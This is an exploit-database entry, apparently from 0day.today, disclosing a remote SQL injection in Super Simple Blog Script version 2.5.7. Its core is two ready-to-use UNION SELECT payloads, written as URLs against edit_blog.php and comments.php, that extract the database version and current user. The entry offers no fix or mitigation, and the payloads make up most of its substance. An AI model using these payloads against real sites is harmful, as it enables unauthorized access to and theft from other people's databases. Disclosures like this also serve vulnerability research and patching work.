super simple 2.5.7 Remote SQL Injection Vulnerability

2014-05-29T00:00:00
ID 1337DAY-ID-22297
Type zdt
Reporter JiKo
Modified 2014-05-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ----------[exploit Debut]
[Remote SQL Injection Vulnerability]
----------[Script Info]
 
Moi : JIKO
 
----------[Script Info]
 
Site:http   : http://www.supersimple.org/
Version     : V2_5_7
Download    : https://codeload.github.com/supersimple/Super-Simple-Blog-Script/zip/master
 
----------[exploit Info]
 
1]~[Sql]
http://localhost/Path/cms/edit_blog.php?colName=uid&colVal=1&table=entries union select concat(version(),0x3A,user()),1,2,3,4,5,6--

http://localhost/Path/comments.php?entry=-122222 union select 0,concat(0x223E,version(),0x3A,user())--
----------[exploit Fin]

#  0day.today [2018-01-10]  #